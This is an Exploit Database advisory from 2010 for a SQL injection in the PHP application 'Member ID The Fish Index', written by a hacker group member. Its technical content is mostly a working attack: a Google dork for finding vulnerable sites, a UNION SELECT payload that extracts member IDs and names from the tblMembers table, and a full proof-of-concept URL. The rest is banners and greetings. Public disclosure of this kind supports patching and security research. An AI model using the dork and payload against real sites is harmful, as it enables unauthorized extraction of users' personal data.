Member ID The Fish Index PHP – SQL Injection

• Exploit Database
• 10 阅读

• 作者： v4lc0m87
  日期： 2010-06-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12850/

• *************************************************************************
   ,
   | ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . ,
   |---| | | | | |---' | | | |---' | | |
   | `---' `---| `---' `---' ` `---' ` `---' `---`---
   ` `---'
  *************************************************************************
  [V] Member ID The Fish Index PHP SQL Injection Vulnerability
   
  --==[ Author ]==--
  
  [+] Author: v4lc0m87
  [+] Contact : valcom87[at]gmail[dot]com
  [+] Group : INDONESIAN CYBER
  [+] Site: http://indonesian-cyber.org/
  [+] Date: June, 3-2010 [INDONESIA]
   
  *************************************************************************
  --==[ Details ]==--
   
  [+] Vulnerable: SQL Injection
  [+] Google Dork : inurl:index.php?myPlantId=
   
  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
   
  [-] Exploit :
  [+] 9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
   
  [-] Remote SQLi p0c :
  [+] http://127.0.0.1/[path]/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
   
   
  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
   
  INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC
   
  [V] Greetz :
  SaruKusai, MarilynMesum (smoga jadi pasangan sejati wkwkwkwk)
  Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
  Bocah tua nakal (mbah l4mpor,awchoy)
  flyff666 cruz3N petimati spykit v3n0m uzanc
  kokoh wisdom (di FB koq curhat mlu sih koh :p)
  blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk)
  [K]urabu[S]aru [RnR] cO2 community
  and y0u !!